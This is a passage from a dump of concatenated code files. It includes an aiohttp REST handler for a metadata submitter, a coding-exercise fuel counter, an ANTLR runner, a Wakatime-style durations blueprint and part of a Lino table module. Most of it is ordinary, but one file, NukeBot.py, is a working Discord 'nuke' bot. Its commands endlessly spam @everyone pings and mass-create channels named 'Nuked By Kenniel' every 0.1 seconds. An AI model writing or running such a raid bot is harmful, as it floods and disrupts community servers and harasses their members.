schema_type: str) -> None:\n \"\"\"Check if schema type exists.\n\n :param schema_type: schema type.\n :raises: HTTPNotFound if schema does not exist.\n \"\"\"\n if schema_type not in set(schema_types.keys()):\n reason = f\"Specified schema {schema_type} was not found.\"\n LOG.error(reason)\n raise web.HTTPNotFound(reason=reason)\n\n def _get_page_param(self, req: Request, name: str, default: int) -> int:\n \"\"\"Handle page parameter value extracting.\n\n :param req: GET Request\n :param param_name: Name of the parameter\n :param default: Default value in case parameter not specified in request\n :returns: Page parameter value\n \"\"\"\n try:\n param = int(req.query.get(name, str(default)))\n except ValueError as exc:\n reason = f\"{name} parameter must be a number, now it is {req.query.get(name)}\"\n LOG.exception(reason)\n raise web.HTTPBadRequest(reason=reason) from exc\n if param < 1:\n reason = f\"{name} parameter must be over 0\"\n LOG.error(reason)\n raise web.HTTPBadRequest(reason=reason)\n return param\n\n def _get_param(self, req: Request, name: str) -> str:\n \"\"\"Extract mandatory query parameter from URL.\n\n :param req: GET Request\n :param name: name of query param to get\n :returns: project ID parameter value\n \"\"\"\n param = req.query.get(name, \"\")\n if param == \"\":\n reason = f\"mandatory query parameter {name} is not set\"\n LOG.error(reason)\n raise web.HTTPBadRequest(reason=reason)\n return param\n\n async def _handle_check_ownership(self, req: Request, collection: str, accession_id: str) -> tuple[bool, str]:\n \"\"\"Check if object belongs to project.\n\n For this we need to check the object is in exactly 1 submission and we need to check\n that submission belongs to a project.\n\n :param req: HTTP request\n :param collection: collection or schema of document\n :param doc_id: document accession id\n :raises: HTTPUnauthorized if accession id does not belong to user\n :returns: bool and possible project id\n \"\"\"\n session = await aiohttp_session.get_session(req)\n\n db_client = req.app[\"db_client\"]\n\n current_user = session[\"user_info\"]\n user_op = UserOperator(db_client)\n _check = False\n\n project_id = \"\"\n if collection != \"submission\":\n submission_op = SubmissionOperator(db_client)\n submission_id, _ = await submission_op.check_object_in_submission(collection, accession_id)\n if submission_id:\n # if the draft object is found in submission we just need to check if the submission belongs to user\n _check, project_id = await user_op.check_user_has_doc(req, \"submission\", current_user, submission_id)\n elif collection.startswith(\"template\"):\n # if collection is template but not found in a submission\n # we also check if object is in templates of the user\n # they will be here if they will not be deleted after publish\n _check, project_id = await user_op.check_user_has_doc(req, collection, current_user, accession_id)\n else:\n _check = False\n else:\n _check, project_id = await user_op.check_user_has_doc(req, collection, current_user, accession_id)\n\n if not _check:\n reason = f\"{collection} {accession_id}.\"\n LOG.error(reason)\n raise web.HTTPUnauthorized(reason=reason)\n\n return _check, project_id\n\n async def _get_data(self, req: Request) -> dict[str, Any]:\n \"\"\"Get the data content from a request.\n\n :param req: POST/PUT/PATCH request\n :raises: HTTPBadRequest if request does not have proper JSON data\n :returns: JSON content of the request\n \"\"\"\n try:\n content: dict[str, Any] = await req.json()\n return content\n except json.decoder.JSONDecodeError as e:\n reason = f\"JSON is not correctly formatted, err: {e}\"\n LOG.exception(reason)\n raise web.HTTPBadRequest(reason=reason)\n\n @staticmethod\n def _json_response(data: dict[str, Any] | list[dict[str, Any]]) -> Response:\n \"\"\"Reusable json response, serializing data with ujson.\n\n :param data: Data to be serialized and made into HTTP 200 response\n \"\"\"\n return web.Response(\n body=ujson.dumps(data, escape_forward_slashes=False), status=200, content_type=\"application/json\"\n )\n\n async def get_schema_types(self, _: Request) -> Response:\n \"\"\"Get all possible metadata schema types from database.\n\n Basically returns which objects user can submit and query for.\n\n :returns: JSON list of schema types\n \"\"\"\n data = [x[\"description\"] for x in schema_types.values()]\n LOG.info(\"GET schema types. Retrieved %d schemas.\", len(schema_types))\n return self._json_response(data)\n\n async def get_json_schema(self, req: Request) -> Response:\n \"\"\"Get all JSON Schema for a specific schema type.\n\n Basically returns which objects user can submit and query for.\n :param req: GET Request\n :raises: HTTPBadRequest if request does not find the schema\n :returns: JSON list of schema types\n \"\"\"\n schema_type = req.match_info[\"schema\"]\n self._check_schema_exists(schema_type)\n\n try:\n if schema_type == \"datacite\":\n submission = JSONSchemaLoader().get_schema(\"submission\")\n schema = submission[\"properties\"][\"doiInfo\"]\n else:\n schema = JSONSchemaLoader().get_schema(schema_type)\n LOG.info(\"%s JSON schema loaded.\", schema_type)\n return self._json_response(schema)\n\n except SchemaNotFoundException as error:\n reason = f\"{error} Occured for JSON schema: '{schema_type}'.\"\n LOG.exception(reason)\n raise web.HTTPBadRequest(reason=reason)\n\n async def get_workflows(self, _: Request) -> Response:\n \"\"\"Get all JSON workflows.\n\n Workflows tell what are the requirements for different 'types of submissions' (aka workflow)\n\n :returns: JSON list of workflows\n \"\"\"\n LOG.info(\"GET workflows. Retrieved %d workflows.\", len(WORKFLOWS))\n response = {workflow.name: workflow.description for workflow in WORKFLOWS.values()}\n return self._json_response(response)\n\n async def get_workflow_request(self, req: Request) -> Response:\n \"\"\"Get a single workflow definition by name.\n\n :param req: GET Request\n :raises: HTTPNotFound if workflow doesn't exist\n :returns: workflow as a JSON object\n \"\"\"\n workflow_name = req.match_info[\"workflow\"]\n LOG.info(\"GET workflow: %r.\", workflow_name)\n workflow = self.get_workflow(workflow_name)\n return self._json_response(workflow.workflow)\n\n def get_workflow(self, workflow_name: str) -> Workflow:\n \"\"\"Get a single workflow definition by name.\n\n :param workflow_name: Name of the workflow\n :raises: HTTPNotFound if workflow doesn't exist\n :returns: Workflow\n \"\"\"\n if workflow_name not in WORKFLOWS:\n reason = f\"Workflow {workflow_name} was not found.\"\n LOG.error(reason)\n raise web.HTTPNotFound(reason=reason)\n return WORKFLOWS[workflow_name]\n\n def _header_links(self, url: str, page: int, size: int, total_objects: int) -> CIMultiDict[str]:\n \"\"\"Create link header for pagination.\n\n :param url: base url for request\n :param page: current page\n :param size: results per page\n :param total_objects: total objects to compute the total pages\n :returns: JSON with query results\n \"\"\"\n total_pages = ceil(total_objects / size)\n prev_link = f'<{url}?page={page-1}&per_page={size}>; rel=\"prev\", ' if page > 1 else \"\"\n next_link = f'<{url}?page={page+1}&per_page={size}>; rel=\"next\", ' if page < total_pages else \"\"\n last_link = f'<{url}?page={total_pages}&per_page={size}>; rel=\"last\"' if page < total_pages else \"\"\n comma = \", \" if 1 < page < total_pages else \"\"\n first_link = f'<{url}?page=1&per_page={size}>; rel=\"first\"{comma}' if page > 1 else \"\"\n links = f\"{prev_link}{next_link}{first_link}{last_link}\"\n link_headers = CIMultiDict(Link=f\"{links}\")\n LOG.debug(\"Link headers created\")\n return link_headers\n\n @staticmethod\n def iter_submission_objects(submission: dict[str, Any]) -> Iterator[tuple[str, str]]:\n \"\"\"Iterate over a submission's objects.\n\n :param submission: Submission data\n\n yields accession_id, schema\n \"\"\"\n for _obj in submission[\"metadataObjects\"]:\n accession_id = _obj[\"accessionId\"]\n schema = _obj[\"schema\"]\n\n yield accession_id, schema\n\n async def iter_submission_objects_data(\n self, submission: dict[str, Any], obj_op: ObjectOperator\n ) -> AsyncIterator[tuple[str, str, dict[str, Any]]]:\n \"\"\"Iterate over a submission's objects and retrieve their data.\n\n :param submission: Submission data\n :param obj_op: Object ObjectOperator\n\n yields accession_id, schema, object_data\n \"\"\"\n for accession_id, schema in self.iter_submission_objects(submission):\n object_data, _ = await obj_op.read_metadata_object(schema, accession_id)\n\n if not isinstance(object_data, dict):\n LOG.error(\"Object with accession ID %r is not a Dict. This might be a bug\", accession_id)\n continue\n\n yield accession_id, schema, object_data\n\n\nclass RESTAPIIntegrationHandler(RESTAPIHandler):\n \"\"\"Endpoints that use service integrations.\"\"\"\n\n def __init__(\n self,\n metax_handler: MetaxServiceHandler,\n datacite_handler: DataciteServiceHandler,\n rems_handler: RemsServiceHandler,\n mq_publisher: Optional[MQPublisher] = None,\n ) -> None:\n \"\"\"Endpoints should have access to metax and datacite services.\"\"\"\n self.metax_handler = metax_handler\n self.datacite_handler = datacite_handler\n self.rems_handler = rems_handler\n if mq_publisher:\n self.mq_publisher = mq_publisher\n\n @staticmethod\n async def get_user_external_id(request: web.Request) -> str:\n \"\"\"Get current user's external id.\n\n :param request: current HTTP request made by the user\n :returns: Current users external ID\n \"\"\"\n session = await aiohttp_session.get_session(request)\n current_user = session[\"user_info\"]\n user_op = UserOperator(request.app[\"db_client\"])\n user = await user_op.read_user(current_user)\n metadata_provider_user: str = user[\"externalId\"]\n return metadata_provider_user\n\n async def create_metax_dataset(\n self, obj_op: ObjectOperator, collection: str, obj: dict[str, Any], external_id: str\n ) -> str:\n \"\"\"Handle connection to Metax api handler for dataset creation.\n\n Dataset or Study object is assigned with DOI\n and it's data is sent to Metax api handler.\n Object database entry is updated with metax ID returned by Metax service.\n\n :param obj_op: Object ObjectOperator\n :param collection: object's schema\n :param obj: metadata object\n :param external_id: user id\n :returns: Metax ID\n \"\"\"\n LOG.info(\"Creating draft dataset to Metax.\")\n new_info = {}\n if \"doi\" in obj:\n new_info[\"doi\"] = obj[\"doi\"]\n metax_id = await self.metax_handler.post_dataset_as_draft(external_id, collection, obj)\n new_info[\"metaxIdentifier\"] = metax_id\n await obj_op.update_identifiers(collection, obj[\"accessionId\"], new_info)\n\n return metax_id\n\n async def create_draft_doi(self, collection: str) -> str:\n \"\"\"Create draft DOI for study and dataset.\n\n The Draft DOI will be created only on POST and the data added to the\n submission. Any update of this should not be possible.\n\n :param collection: either study or dataset\n :returns: Dict with DOI of the study or dataset as well as the types.\n \"\"\"\n _doi_data = await self.datacite_handler.create_draft(prefix=collection)\n\n LOG.debug(\"DOI created with identifier: %r\", _doi_data[\"fullDOI\"])\n doi: str = _doi_data[\"fullDOI\"]\n\n return doi\n\n async def check_rems_ok(self, submission: dict[str, Any]) -> bool:\n \"\"\"Check that REMS DAC in object is ok.\"\"\"\n if \"rems\" not in submission:\n raise web.HTTPBadRequest(reason=\"REMS field is missing.\")\n\n dac = submission[\"rems\"]\n\n if \"workflowId\" in dac and \"organizationId\" in dac and \"licenses\" in dac:\n await self.rems_handler.validate_workflow_licenses(\n dac[\"organizationId\"], dac[\"workflowId\"], dac[\"licenses\"]\n )\n else:\n raise web.HTTPBadRequest(\n reason=\"REMS DAC is missing one or more of the required fields: \"\n \"'workflowId', 'organizationId', or 'licenses'.\"\n )\n\n return True\n","repo_name":"CSCfi/metadata-submitter","sub_path":"metadata_backend/api/handlers/restapi.py","file_name":"restapi.py","file_ext":"py","file_size_in_byte":14430,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72603696809","text":"#!/usr/bin/python3\nimport re\nimport nltk\nimport sys\nimport getopt\n\ndef usage():\n print(\"usage: \" + sys.argv[0] + \" -d dictionary-file -p postings-file -q file-of-queries -o output-file-of-results\")\n\ndef run_search(dict_file, postings_file, queries_file, results_file):\n \"\"\"\n using the given dictionary file and postings file,\n perform searching on the given queries file and output the results to a file\n \"\"\"\n print('running search on the queries...')\n # This is an empty method\n # Pls implement your code in below\n\ndictionary_file = postings_file = file_of_queries = output_file_of_results = None\n\ntry:\n opts, args = getopt.getopt(sys.argv[1:], 'd:p:q:o:')\nexcept getopt.GetoptError:\n usage()\n sys.exit(2)\n\nfor o, a in opts:\n if o == '-d':\n dictionary_file = a\n elif o == '-p':\n postings_file = a\n elif o == '-q':\n file_of_queries = a\n elif o == '-o':\n file_of_output = a\n else:\n assert False, \"unhandled option\"\n\nif dictionary_file == None or postings_file == None or file_of_queries == None or file_of_output == None :\n usage()\n sys.exit(2)\n\nrun_search(dictionary_file, postings_file, file_of_queries, file_of_output)\n","repo_name":"danxuZhang/NUS-CS3245","sub_path":"HW2/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16680973768","text":"alcool = 0\r\ngasolina = 0\r\ndisel = 0\r\nj = 0\r\nwhile j == 0:\r\n n = int(input(\"\"))\r\n if n == 1:\r\n alcool += 1\r\n elif n == 2:\r\n gasolina += 1\r\n elif n == 3:\r\n disel += 1\r\n elif n == 4:\r\n j = 1\r\nprint(\"MUITO OBRIGADO\")\r\nprint(f\"Alcool: {alcool}\")\r\nprint(f\"Gasolina: {gasolina}\")\r\nprint(f\"Diesel: {disel}\")","repo_name":"Gustavll/uri-python","sub_path":"uri1134.py","file_name":"uri1134.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39520765736","text":"# Commands\n#1 .ping\n#2 .create\n\n# Reminder python is case sensitive don't do .Create or .Ping \n\nimport discord\nfrom discord.ext import commands\nimport asyncio\n\nbot = commands.Bot(command_prefix='.')\nBOT_TOKEN = 'TOKEN_HERE'\n\n# Label: Send message every X seconds\nasync def send_everyone_message(ctx):\n while True:\n await ctx.send(\"@everyone\")\n print(\"Successfully sent @everyone message!\")\n await asyncio.sleep(0.1) # Adjust The Time to your wanted Time\n\n# Label: Create new text channel every hour\nasync def create_new_channel(guild):\n while True:\n new_channel = await guild.create_text_channel(name='Nuked By Kenniel') #Change Name on (name= 'Change_HERE')\n print(f\"Created new channel: {new_channel.name}\")\n await new_channel.send(\"@everyone DISCORD_SERVER\") # Send message to the new created channel = Nuking...\n await asyncio.sleep(0.1) # Wait for an hour\n\n@bot.command()\nasync def ping(ctx):\n await send_everyone_message(ctx)\n\n@bot.command()\nasync def create(ctx):\n await create_new_channel(ctx.guild)\n\n@bot.event\nasync def on_ready():\n print(f\"Logged in as {bot.user.name}\")\n\nbot.run(BOT_TOKEN)\n\n","repo_name":"Kenniel123/Kenniel-NukeBot","sub_path":"NukeBot.py","file_name":"NukeBot.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13371356545","text":"import sys\nfrom antlr4 import *\nfrom compiladoresLexer import compiladoresLexer\nfrom compiladoresParser import compiladoresParser\nfrom MyListener import MyListener\n\ndef main(argv):\n archivo = \"input/entrada.txt\"\n if len(argv) > 1 :\n archivo = argv[1]\n input = FileStream(archivo)\n lexer = compiladoresLexer(input)\n stream = CommonTokenStream(lexer)\n parser = compiladoresParser(stream)\n miListener = MyListener()\n parser.addParseListener(miListener)\n tree = parser.programa()\n\nif __name__ == '__main__':\n main(sys.argv)","repo_name":"NachoMendezSP/compiladores","sub_path":"src/main/python/App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6598393782","text":"class Food:\r\n def __init__(self, name, initial_quality):\r\n self.name = name\r\n self.initial_quality = initial_quality\r\n self.current_quality = initial_quality\r\n\r\n def check_freshness(self):\r\n \"\"\"\r\n Let's assume that this function can somehow access sensor data and\r\n updates the current quality of the food item.\r\n \"\"\"\r\n sensor_data = self.get_sensor_data()\r\n self.current_quality = self.process_sensor_data(sensor_data)\r\n\r\n if self.current_quality < 0.5 * self.initial_quality:\r\n return False\r\n else:\r\n return True\r\n\r\n def get_sensor_data(self):\r\n \"\"\"\r\n This is a placeholder for function that would collect data from a sensor.\r\n \"\"\"\r\n # Since we don't have actual sensors, we'll simulate a quality decrease by returning a random number\r\n import random\r\n return random.uniform(0, 1)\r\n\r\n def process_sensor_data(self, sensor_data):\r\n \"\"\"\r\n This is a placeholder for function that would process the sensor data.\r\n \"\"\"\r\n # For this example, let's just return the sensor data\r\n return sensor_data\r\n\r\n# Example usage:\r\n\r\nbanana = Food(\"Banana\", initial_quality=1.0)\r\n\r\nif banana.check_freshness():\r\n print(f\"The {banana.name} is fresh.\")\r\nelse:\r\n print(f\"The {banana.name} is not fresh.\")\r\n","repo_name":"roomaustin/Food-Test","sub_path":"Food-Test-Hypothetical.py","file_name":"Food-Test-Hypothetical.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28636503985","text":"import os\nimport sys\nimport numpy as np\nfrom pdb import set_trace\nimport module as mod\nimport parameter as para\nfrom mpi4py import MPI\ncomm = MPI.COMM_WORLD\nimport pickle\n\nrank = comm.Get_rank()\nsize = comm.Get_size()\n\n\ndef ini_shape():\n\n\tif (para.Restart==1):\n\t\tdata \t\t\t= pickle.load( open( para.Resname, \"rb\" ) )\n\n\t\tmod.t \t\t\t= data['time']\t\t\t\n\t\tmod.zg \t\t\t= data['z']\t\t\n\t\tmod.z0 \t\t\t= data['z0']\t\t\t\n\t\tmod.gamma\t\t= data['gamma']\t\n\n\t\tmod.dataj\t\t= para.Res_i\n\t\tmod.plotj\t\t= para.Res_i\n\t\tmod.Ng \t\t\t= len(mod.zg)\n\telse:\t\n\t\talpha \t=\tpara.alpha\n\t\tR \t\t=\tpara.R\n\t\tn \t\t=\tpara.n\n\n\t\t# xn \t\t=\t(-0.052548103890057304-0.004128940307543485j)\n\t\t# xn2 \t=\t(0.017920232977232567+0.002658398993006049j)\n\t\t# xn3 \t=\t(-0.008535189439188302-0.0016199392387838797j)\n\t\t# xn4 \t=\t(0.004667277501091407+0.0009935965353182817j)\n\t\t# xn5 \t=\t(-0.002735911613585555-0.0006034506962295917j)\n\n\t\txn \t\t\t\t=\t1./500\n\t\txn2,xn3,xn4,xn5 =\t0,0,0,0\n\n\t\tx0 \t\t=\t-(np.abs(xn)**2+np.abs(xn2)**2+np.abs(xn3)**2+np.abs(xn4)**2+np.abs(xn5)**2)/R\n\t\t\t\n\t\txi\t\t=\tx0+ xn*np.exp(1j*n*alpha)+np.conj(xn)*np.exp(-1j*n*alpha)\\\n\t\t\t\t\t+xn2*np.exp(1j*n*2*alpha)+np.conj(xn2)*np.exp(-1j*n*2*alpha)\\\n\t\t\t\t\t+xn3*np.exp(1j*n*3*alpha)+np.conj(xn3)*np.exp(-1j*n*3*alpha)\\\n\t\t\t\t\t+xn4*np.exp(1j*n*4*alpha)+np.conj(xn4)*np.exp(-1j*n*4*alpha)\\\n\t\t\t\t\t+xn5*np.exp(1j*n*5*alpha)+np.conj(xn5)*np.exp(-1j*n*5*alpha)\n\t\n\t\tRR \t\t=\tR+xi\n\t\tmod.z0 \t=\tRR*np.cos(alpha)+1j*RR*np.sin(alpha)\n\t\tmod.zg \t=\tmod.z0*1.0\n\n\t\t#initialize gamma\n\t\tgamma_0 = 0.1\n\t\tmod.gamma = gamma_0*np.ones(para.Ng)\n\n\n\tif (rank==0):\n\t\tprint(' ')\n\t\tprint('--->','PURTURBATION INITIALIZATION FINISHED!')\n\n\treturn mod.extent_in\n\n\ndef ini_mpi(size,rank):\t\n\n\tmod.Nl \t\t\t= int(para.Ng/size)\t\n\tmod.extent \t\t= get_MPI_extent(para.Ng,rank,size)\n\tmod.extent_in \t= get_MPI_extent_int(para.Ng,rank,size)\n\n\tif (rank==0):\n\t\tprint(' ')\n\t\tprint('--->','MPI INITIALIZATION FINISHED!')\n\n\treturn mod.extent_in\n\ndef get_MPI_extent(Nglobal, myrank, totalsize ):\n\n\tNl = int(Nglobal/totalsize)\n\tngost=para.nghost\n\tG_list=np.arange(0, Nglobal, dtype=int)\n\n\n\tif (totalsize==1):\n\t\textent = np.concatenate([G_list[-ngost:],G_list,G_list[:ngost]])\n\n\telse:\t\n\t\tif myrank == 0:\n\t\t\textent = np.concatenate([G_list[-ngost:],G_list[:Nl*(myrank+1)+ngost]])\n\n\t\telif myrank == (totalsize-1):\n\t\t\textent = np.concatenate([G_list[Nl*myrank-ngost:],G_list[:ngost]])\n\n\t\telse:\n\t\t\textent = G_list[Nl*(myrank)-ngost:Nl*(myrank+1)+ngost]\n\n\treturn extent\n\ndef get_MPI_extent_int(Nglobal, myrank, totalsize ):\n\n\n\n\tNl = int(Nglobal/totalsize)\n\tngost=para.nghost_in\n\tG_list=np.arange(0, Nglobal, dtype=int)\n\n\tif (totalsize==1):\n\t\textent = np.concatenate([G_list[-ngost:],G_list,G_list[:ngost]])\n\n\telse:\n\t\tif myrank == 0:\n\t\t\textent = np.concatenate([G_list[-ngost:],G_list[:Nl*(myrank+1)+ngost]])\n\n\t\telif myrank == (totalsize-1):\n\t\t\textent = np.concatenate([G_list[Nl*myrank-ngost:],G_list[:ngost]])\n\n\t\telse:\n\t\t\textent = G_list[Nl*(myrank)-ngost:Nl*(myrank+1)+ngost]\n\n\treturn extent\t\n\n\n","repo_name":"zongxin/Ferroflui_Droplet_MPI","sub_path":"source/initialization.py","file_name":"initialization.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74753855207","text":"import pprint\nimport pickle\nimport sys\n\ndef main():\n \n inFile = sys.argv[1]\n\n with open(inFile, 'rb') as cached_pcd_file:\n cache_data = pickle.load(cached_pcd_file)\n pprint.pprint(cache_data)\n return\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"danneengelson/urbanroadsweeper","sub_path":"print_dictionary.py","file_name":"print_dictionary.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"28644654577","text":"# durations part of the wakatime api\n# https://wakatime.com/developers#durations\n\nimport uuid\nimport logging\nimport datetime\nfrom typing import List, Dict, Any, Tuple\n\nimport pytz\nfrom quart import Blueprint, request, jsonify, current_app as app\n\nfrom rana.auth import token_check\nfrom rana.utils import jsonify\nfrom rana.models import validate, DURATIONS_IN\nfrom rana.database import timestamp_\n\nlog = logging.getLogger(__name__)\nbp = Blueprint(\"durations\", __name__)\n\n\ndef _isofy(posix_tstamp: int) -> str:\n \"\"\"Return an ISO timestamp out of a POSIX integer timestamp.\"\"\"\n return datetime.datetime.fromtimestamp(posix_tstamp).isoformat()\n\n\ndef posix_dt_user(posix_tstamp: float, user_tz) -> datetime.datetime:\n \"\"\"From a posix timestamp (without timezone), convert it to a\n datetime object that is in view with the given user_tz.\"\"\"\n dt = datetime.datetime.fromtimestamp(posix_tstamp)\n return dt.astimezone(user_tz)\n\n\ndef convert_tz(dtime: datetime.datetime, old_tz: datetime.timezone, new_tz: str):\n \"\"\"Convert a non-timezone-aware datetime object (assumed to be on the\n given old_tz) into a new timezone.\n\n Given the current user's timezone.\n \"\"\"\n aware_dtime = datetime.datetime(\n dtime.year,\n dtime.month,\n dtime.day,\n dtime.hour,\n dtime.minute,\n dtime.second,\n tzinfo=old_tz,\n )\n\n new_as_tz = pytz.timezone(new_tz)\n return aware_dtime.astimezone(new_as_tz)\n\n\ndef _dur(row, do_user=False):\n \"\"\"Duration object from row.\"\"\"\n duration = {\"language\": row[1], \"project\": row[2], \"start\": row[3], \"end\": row[4]}\n\n if do_user:\n duration[\"user_id\"] = row[0]\n\n return duration\n\n\ndef durations_from_rows(rows, *, do_user=False) -> List[Dict[str, Any]]:\n \"\"\"Make a list of durations out of a list of heartbeats.\"\"\"\n durations_lst: List[Dict[str, Any]] = []\n\n for row in rows:\n # try to fetch the current latest duration in the list\n # and if its duration's end equals to the row's start, we\n # merge the row's end to the duration's end.\n try:\n lat_duration = durations_lst[len(durations_lst) - 1]\n\n # only update the latest duration if:\n # - the incoming row matches in project name, and\n # - if the incoming row is at MOST 10 minutes separated\n # from the latest duration\n is_same_project = row[2] == lat_duration[\"project\"]\n is_mergeable = (row[3] - lat_duration[\"end\"]) < 600\n\n if is_same_project and is_mergeable:\n lat_duration[\"end\"] = row[4]\n else:\n durations_lst.append(_dur(row, do_user))\n except IndexError:\n durations_lst.append(_dur(row, do_user))\n\n return durations_lst\n\n\nasync def calc_durations(\n user_id: uuid.UUID, spans: Tuple[int, int], *, more_raw=False\n) -> list:\n \"\"\"Iteraively calculate the durations of a given user based\n on the heartbeats.\"\"\"\n log.debug(\n \"calculating durations for uid %r, span0 %r, span1 %r\",\n user_id,\n spans[0],\n spans[1],\n )\n\n # spans.0 and spans.1 are in utc, as posix timestamps.\n # for all purposes, we want to convert from utc back to\n # the user's local timestamp\n rows = await app.db.fetch(\n f\"\"\"\n SELECT s.user_id, s.language, s.project, s.started_at, s.ended_at\n FROM (\n SELECT user_id, language, project, time AS started_at,\n (LAG(time) OVER (ORDER BY time DESC)) AS ended_at\n FROM heartbeats\n WHERE user_id = $1 and time > $2 and time < $3 and is_write = true\n GROUP BY user_id, language, project, time\n ORDER BY started_at) AS s\n WHERE s.ended_at - s.started_at < 600\n \"\"\",\n user_id,\n spans[0],\n spans[1],\n )\n\n durations_lst = durations_from_rows(rows)\n user_tz = await app.db.fetch_user_tz(user_id)\n\n def _convert_duration(dur):\n # converting from UTC to user tz.\n # pytz already assumes the timezone is UTC when the\n # datetime object isn't timezone aware, which is good.\n start = posix_dt_user(dur[\"start\"], user_tz)\n end = posix_dt_user(dur[\"end\"], user_tz)\n\n if more_raw:\n return {\n \"project\": dur[\"project\"] or \"Other\",\n \"language\": dur[\"language\"] or \"Other\",\n \"start\": start,\n \"end\": end,\n }\n\n return {\n \"project\": dur[\"project\"] or \"Other\",\n \"language\": dur[\"language\"] or \"Other\",\n \"start\": start.isoformat(),\n \"end\": end.isoformat(),\n }\n\n return list(map(_convert_duration, durations_lst))\n\n\nasync def durations(user_id: uuid.UUID, args: dict):\n \"\"\"Calculate user's durations for a given day (in args.date).\n\n Returns the JSON response for the API.\n \"\"\"\n # args['date'] is in the user's current timezone.\n # we must convert it first to UTC, and from there,\n # make our calc_durations query.\n spans = args[\"date\"].spans_as_dt\n\n user_tz = await app.db.fetch_user_tz(user_id)\n start = convert_tz(spans[0], user_tz, \"UTC\")\n end = convert_tz(spans[1], user_tz, \"UTC\")\n\n # since now start, and end point to UTC, we can convert\n # them to timestamps for the DB query.\n durations_lst = await calc_durations(user_id, (start.timestamp(), end.timestamp()))\n\n return jsonify(\n durations_lst,\n extra={\n \"branches\": [\"master\"],\n \"start\": start.isoformat(),\n \"end\": end.isoformat(),\n },\n )\n\n\n@bp.route(\"/current/durations\")\nasync def current_user_durations():\n user_id = await token_check()\n args = validate(dict(request.args), DURATIONS_IN)\n return await durations(user_id, args)\n","repo_name":"lun-4/rana","sub_path":"rana/blueprints/durations.py","file_name":"durations.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"73722664167","text":"import re\nfrom html import escape\nimport types\nimport datetime\n\nfrom etgen.html import E\n\nfrom django.db import models\nfrom django.conf import settings\n\nfrom lino.utils.report import EmptyTable\nfrom lino.utils import AttrDict\nfrom lino.core.utils import get_models\nfrom lino.utils.code import codefiles, SourceFile\nfrom lino.utils import join_elems\nfrom lino.api import rt, dd, _\n\n# from .mixins import Searchable\nfrom .roles import SiteSearcher\nfrom .choicelists import TimeZones\n\nclass Models(dd.VirtualTable):\n label = _(\"Models\")\n # column_defaults = dict(width=8)\n # column_names = \"app name verbose_name docstring rows\"\n column_names = \"app name fields #docstring tables rows detail_action_column\"\n detail_layout = \"\"\"\n app name docstring rows\n about.FieldsByModel\n \"\"\"\n\n display_mode = 'html'\n\n @classmethod\n def get_data_rows(self, ar):\n # user_type = ar.get_user().user_type\n for model in get_models():\n if True:\n # print model\n yield model\n\n @classmethod\n def summary_row(cls, ar, obj, **kw):\n return [str(obj._meta.verbose_name_plural)]\n\n @dd.displayfield(_(\"app_label\"))\n def app(self, obj, ar):\n return obj._meta.app_label\n\n @dd.displayfield(_(\"name\"))\n def name(self, obj, ar):\n return obj.__name__\n\n @dd.displayfield(_(\"Detail Action\"))\n def detail_action_column(self, obj, ar):\n if obj.get_default_table().detail_action is None:\n return ''\n return obj.get_default_table().detail_action.full_name()\n\n @dd.displayfield(_(\"Tables\"))\n def tables(self, obj, ar):\n # tables = obj._lino_slaves.values()\n def fmt(tbl):\n url = tbl.__module__ + '.' + tbl.__name__\n return E.a(tbl.__name__, href=url)\n return join_elems([fmt(tbl) for tbl in obj._lino_tables])\n # return obj.get_default_table().detail_action.full_name()\n\n # @dd.displayfield(_(\"verbose name\"))\n # def vebose_name(self,obj,ar):\n # return unicode(obj._meta.vebose_name)\n\n @dd.displayfield(_(\"docstring\"))\n def docstring(self, obj, ar):\n return obj.__doc__\n # return restify(unicode(obj.__doc__))\n\n @dd.requestfield(_(\"Rows\"))\n def rows(self, obj, ar):\n return obj.get_default_table().request(\n user=ar.get_user(), renderer=ar.renderer)\n\n @dd.displayfield(_(\"Fields\"))\n def fields(self, obj, ar):\n return ' '.join([f.name for f in obj._meta.get_fields()])\n\n\nclass FieldsByModel(dd.VirtualTable):\n label = _(\"Fields\")\n # master_key = \"model\"\n # master = Models\n column_names = \"name verbose_name help_text_column\"\n\n @classmethod\n def get_data_rows(self, ar):\n model = ar.master_instance\n if model:\n for (fld, remote) in model._meta.get_fields_with_model():\n yield fld\n\n @dd.displayfield(_(\"name\"))\n def name(self, fld, ar):\n return fld.name\n\n @dd.displayfield(_(\"verbose name\"))\n def verbose_name(self, fld, ar):\n return str(fld.vebose_name)\n\n @dd.displayfield(_(\"help text\"))\n def help_text_column(self, obj, ar):\n # return obj.__doc__\n return restify(str(obj.help_text))\n\n\nclass Inspected(object):\n\n def __init__(self, parent, prefix, name, value):\n self.parent = parent\n self.prefix = prefix\n self.name = name\n self.value = value\n\n\nclass Inspector(dd.VirtualTable):\n \"\"\"\n Shows a simplistic \"inspector\" which once helped me for debugging.\n Needs more work to become seriously useful...\n\n \"\"\"\n label = _(\"Inspector\")\n required_roles = dd.login_required(dd.SiteStaff)\n column_names = \"i_name i_type i_value\"\n parameters = dict(\n inspected=models.CharField(\n _(\"Inspected object\"), max_length=100, blank=True),\n show_callables=models.BooleanField(_(\"show callables\"), default=False)\n )\n params_layout = 'inspected show_callables'\n # editable = False\n # display_mode = 'html'\n\n @classmethod\n def get_inspected(self, name):\n # ctx = dict(settings=settings,lino=lino)\n if not name:\n return 